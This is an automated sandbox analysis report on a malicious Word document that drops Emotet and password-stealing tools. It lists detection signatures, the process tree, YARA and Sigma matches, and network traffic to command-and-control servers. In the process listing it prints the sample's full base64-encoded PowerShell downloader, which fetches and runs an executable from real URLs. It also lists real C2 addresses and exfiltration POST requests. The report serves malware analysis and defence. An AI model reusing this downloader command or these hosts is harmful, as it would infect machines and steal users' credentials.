Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Exploit.Siggen2.12943.15385.16201

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen2.12943.15385.16201 (renamed file extension from 16201 to doc)
Analysis ID:255710
MD5:36fea8be4bf559852cc841616ff794d8
SHA1:8aad9e4cb79ba290cae31a510e3b744367f5326d
SHA256:43b649f8d39c8356d4c4920c61581ed58f90e56954ed5f90481f3b09cd059be0

Most interesting Screenshot:

Detection

Emotet MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Emotet Banking Trojan found
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected Emotet Downloader
Yara detected MailPassView
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA with many randomly named variables
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Svchost Process
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Very long command line found
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Allocates a big amount of memory (probably used for heap spraying)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Process Creation
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6260 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • powershell.exe (PID: 4616 cmdline: powersheLL -e JABHAFMASgBLAE8AdABrAGoAPQAnAEgAUQBGAFEAVwB6AGUAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AGAAUgBgAEkAVAB5AFAAcgBgAG8AVABPAGMATwBMACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAUwBYAEwAVQBQAGcAdwBpACAAPQAgACcANQA0ADUAJwA7ACQAVwBBAFEATABOAG8AdwBoAD0AJwBPAEgASQBFAFoAeQBoAHUAJwA7ACQAUQBMAFMASgBLAGkAcQBhAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABTAFgATABVAFAAZwB3AGkAKwAnAC4AZQB4AGUAJwA7ACQARwBXAFoAWgBCAGoAagBqAD0AJwBDAEEATABRAEIAcwB1AG0AJwA7ACQAUgBOAFoATABNAHAAZQB6AD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAEUAVAAuAFcARQBCAEMATABpAEUATgBUADsAJABGAEwAWQBDAE4AaQBwAGUAPQAnAGgAdAB0AHAAOgAvAC8AagBrAG4AYwByAGUAdwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAEsAaABTAE8AMQA2AFoAQQBBAGYALwAqAGgAdAB0AHAAOgAvAC8AagBtAGwAYQBuAGQAcwBjAGEAcABpAG4AZwBzAGUAcgB2AGkAYwBlAC4AYwBvAG0ALwBjAG8AbgB0AGUAbgB0AC8AZgBoAEcAQQBmAEsAcwAvACoAaAB0AHQAcAA6AC8ALwBqAGkAbQBsAG8AdwByAHkALgBjAG8AbQAvAGQAbABxAEMAVABjADAAMQBwAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbABlAHMAbABpAGUAbQBvAG4AdABlAG4AZQBnAHIAbwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ASQAxAGgASABxAEQARQA2AC8AKgBoAHQAdABwADoALwAvAGoAbwBoAG4AawBlAGEAbgBlAHMAdAB1AGQAaQBvAHMALgBjAG8AbQAvAHIAMAAwAHQALwB2AEEAVwBFAGwAUgBtAC8AJwAuACIAUwBQAEwAYABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABRAEcAVwBWAFMAbABkAHUAPQAnAFkATQBHAFIAUABmAGIAZwAnADsAZgBvAHIAZQBhAGMAaAAoACQASgBXAFAAQQBJAGoAbwBtACAAaQBuACAAJABGAEwAWQBDAE4AaQBwAGUAKQB7AHQAcgB5AHsAJABSAE4AWgBMAE0AcABlAHoALgAiAEQAbwBXAGAATgBMAG8AQQBgAEQARgBpAEwARQAiACgAJABKAFcAUABBAEkAagBvAG0ALAAgACQAUQBMAFMASgBLAGkAcQBhACkAOwAkAEMAWABaAEcAQwBkAGEAdAA9ACcAVgBYAEYAUQBKAG4AcABxACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQAUQBMAFMASgBLAGkAcQBhACkALgAiAGwAYABlAE4AZwB0AEgAIgAgAC0AZwBlACAAMwAwADIAMAA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAFIAYABlAEEAdABlACIAKAAkAFEATABTAEoASwBpAHEAYQApADsAJABLAEUATgBXAEgAcwBsAHcAPQAnAEwATABGAE8AVQBiAHMAcAAnADsAYgByAGUAYQBrADsAJABLAEUAUwBWAFkAZQBoAHgAPQAnAEkARABUAEIAWQBzAHcAdgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAEIAUgBOAFIAZwBzAGgAPQAnAFAASQBMAE8AUgB4AGYAZwAnAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 4808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6940 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • 545.exe (PID: 5980 cmdline: C:\Users\user\545.exe MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)
    • KernelBase.exe (PID: 6960 cmdline: C:\Windows\SysWOW64\olecli32\KernelBase.exe MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)
      • svchost.exe (PID: 3624 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • KernelBase.exe (PID: 4516 cmdline: 'C:\Windows\SysWOW64\olecli32\KernelBase.exe' 'C:\Users\user~1\AppData\Local\Temp\9FB0.tmp' MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)
      • KernelBase.exe (PID: 6752 cmdline: 'C:\Windows\SysWOW64\olecli32\KernelBase.exe' /scomma 'C:\Users\user~1\AppData\Local\Temp\A714.tmp' MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)
      • KernelBase.exe (PID: 3624 cmdline: 'C:\Windows\SysWOW64\olecli32\KernelBase.exe' /scomma 'C:\Users\user~1\AppData\Local\Temp\A909.tmp' MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)
      • KernelBaseoe.exe (PID: 4324 cmdline: 'C:\Windows\SysWOW64\olecli32\KernelBaseoe.exe' 'C:\Users\user~1\AppData\Local\Temp\9FB0.tmp' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • svchost.exe (PID: 5020 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5668 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 3396 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 3448 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 892 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6756 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6584 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wisvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4340 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6668 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\20200802\PowerShell_transcript.579569.3ZGnUeWK.20200802001556.txtPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x23:$s1: PowerShell
  • 0x105:$s1: powersheLL
  • 0xfd1:$s1: PowerShell
  • 0x23:$sr1: PowerShell
  • 0xfd1:$sr1: PowerShell
  • 0x23:$sn3: PowerShell
  • 0xfd1:$sn3: PowerShell
  • 0x107:$a1: wersheLL -e
C:\Users\user\Documents\20200802\PowerShell_transcript.579569.3ZGnUeWK.20200802001556.txtJoeSecurity_EmotetDownloaderYara detected Emotet DownloaderJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000010.00000002.370334876.0000000000400000.00000040.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
      00000007.00000002.516703537.00000000021E1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000007.00000003.364567875.0000000002954000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000010.00000001.366367529.0000000000400000.00000040.00020000.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
            00000007.00000003.365514796.00000000036BC000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
              Click to see the 22 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              7.2.KernelBase.exe.3300000.3.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                7.2.KernelBase.exe.3150000.2.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  17.1.KernelBase.exe.400000.0.raw.unpackAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
                  • 0x147b0:$a1: logins.json
                  • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
                  • 0x14f34:$s4: \mozsqlite3.dll
                  • 0x137a4:$s5: SMTP Password
                  17.1.KernelBase.exe.400000.0.raw.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
                    7.3.KernelBase.exe.3470000.3.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                      Click to see the 19 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Svchost ProcessShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\olecli32\KernelBase.exe, ParentImage: C:\Windows\SysWOW64\olecli32\KernelBase.exe, ParentProcessId: 6960, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, ProcessId: 3624
                      Sigma detected: Suspicious Process CreationShow sources
                      Source: Process startedAuthor: Florian Roth, Daniil Yugoslavskiy, oscd.community (update): Data: Command: 'C:\Windows\SysWOW64\olecli32\KernelBase.exe' /scomma 'C:\Users\user~1\AppData\Local\Temp\A714.tmp', CommandLine: 'C:\Windows\SysWOW64\olecli32\KernelBase.exe' /scomma 'C:\Users\user~1\AppData\Local\Temp\A714.tmp', CommandLine|base64offset|contains: (f, Image: C:\Windows\SysWOW64\olecli32\KernelBase.exe, NewProcessName: C:\Windows\SysWOW64\olecli32\KernelBase.exe, OriginalFileName: C:\Windows\SysWOW64\olecli32\KernelBase.exe, ParentCommandLine: C:\Windows\SysWOW64\olecli32\KernelBase.exe, ParentImage: C:\Windows\SysWOW64\olecli32\KernelBase.exe, ParentProcessId: 6960, ProcessCommandLine: 'C:\Windows\SysWOW64\olecli32\KernelBase.exe' /scomma 'C:\Users\user~1\AppData\Local\Temp\A714.tmp', ProcessId: 6752

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results
                      Source: C:\Users\user\545.exeCode function: 6_2_00401078 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,6_2_00401078
                      Source: C:\Users\user\545.exeCode function: 6_2_00444717 lstrlenA,FindFirstFileA,FindClose,6_2_00444717
                      Source: C:\Users\user\545.exeCode function: 6_2_004047C0 FindFirstFileA,FindNextFileA,FindClose,6_2_004047C0
                      Source: C:\Users\user\545.exeCode function: 6_2_004028E0 FindFirstFileA,FindClose,6_2_004028E0
                      Source: C:\Users\user\545.exeCode function: 6_2_004390BA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,6_2_004390BA
                      Source: C:\Windows\SysWOW64\olecli32\KernelBase.exeCode function: 16_2_0040A1A7 FindFirstFileW,FindNextFileW,16_2_0040A1A7
                      Source: C:\Windows\SysWOW64\olecli32\KernelBase.exeCode function: 16_1_0040A1A7 FindFirstFileW,FindNextFileW,16_1_0040A1A7
                      Source: C:\Windows\SysWOW64\olecli32\KernelBase.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                      Source: C:\Windows\SysWOW64\olecli32\KernelBase.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                      Source: C:\Windows\SysWOW64\olecli32\KernelBase.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\
                      Source: C:\Windows\SysWOW64\olecli32\KernelBase.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\
                      Source: C:\Windows\SysWOW64\olecli32\KernelBase.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                      Source: C:\Windows\SysWOW64\olecli32\KernelBase.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                      Source: winword.exeMemory has grown: Private usage: 0MB later: 64MB
                      Source: global trafficDNS query: name: jkncrew.com
                      Source: global trafficTCP traffic: 192.168.2.7:49746 -> 185.94.252.13:443
                      Source: global trafficTCP traffic: 192.168.2.7:49732 -> 50.31.160.189:80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 50.31.160.189:80 -> 192.168.2.7:49732
                      Source: TrafficSnort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.7:49746 -> 185.94.252.13:443
                      Source: global trafficHTTP traffic detected: GET /cgi-bin/KhSO16ZAAf/ HTTP/1.1Host: jkncrew.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /content/fhGAfKs/ HTTP/1.1Host: jmlandscapingservice.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /I4YV/ HTTP/1.1Referer: http://185.94.252.13/I4YV/Content-Type: multipart/form-data; boundary=---------------------------746657889525815User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /TT3c/MPj2wQ4oxIl/GrLxPw6nfZdMg4piZv/ HTTP/1.1Referer: http://185.94.252.13/TT3c/MPj2wQ4oxIl/GrLxPw6nfZdMg4piZv/Content-Type: multipart/form-data; boundary=---------------------------635375024525338User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /slt8tXRcU9gh/qyntj3OcAf/jnuisYRQq2a/sBeCxff09ks/TxrMGiSDda3t/ HTTP/1.1Referer: http://185.94.252.13/slt8tXRcU9gh/qyntj3OcAf/jnuisYRQq2a/sBeCxff09ks/TxrMGiSDda3t/Content-Type: multipart/form-data; boundary=---------------------------361669553688262User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /Buooish6GSBz/ HTTP/1.1Referer: http://185.94.252.13/Buooish6GSBz/Content-Type: multipart/form-data; boundary=---------------------------999210879260038User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /L9ZtGO/ HTTP/1.1Referer: http://185.94.252.13/L9ZtGO/Content-Type: multipart/form-data; boundary=---------------------------284212086612098User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /c30TGt0oZY/nRvqNsTCJE4pySgd7H9/WUA2QRQo37JD/ HTTP/1.1Referer: http://185.94.252.13/c30TGt0oZY/nRvqNsTCJE4pySgd7H9/WUA2QRQo37JD/Content-Type: multipart/form-data; boundary=---------------------------555489330362015User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /yfWOtgOeLqG/iUyst3sJZ1/ HTTP/1.1Referer: http://88.217.172.65/yfWOtgOeLqG/iUyst3sJZ1/Content-Type: multipart/form-data; boundary=---------------------------421129473926542User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 88.217.172.65:443Content-Length: 4356Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 73.116.193.136
                      Source: unknownTCP traffic detected without corresponding DNS query: 73.116.193.136
                      Source: unknownTCP traffic detected without corresponding DNS query: 73.116.193.136
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: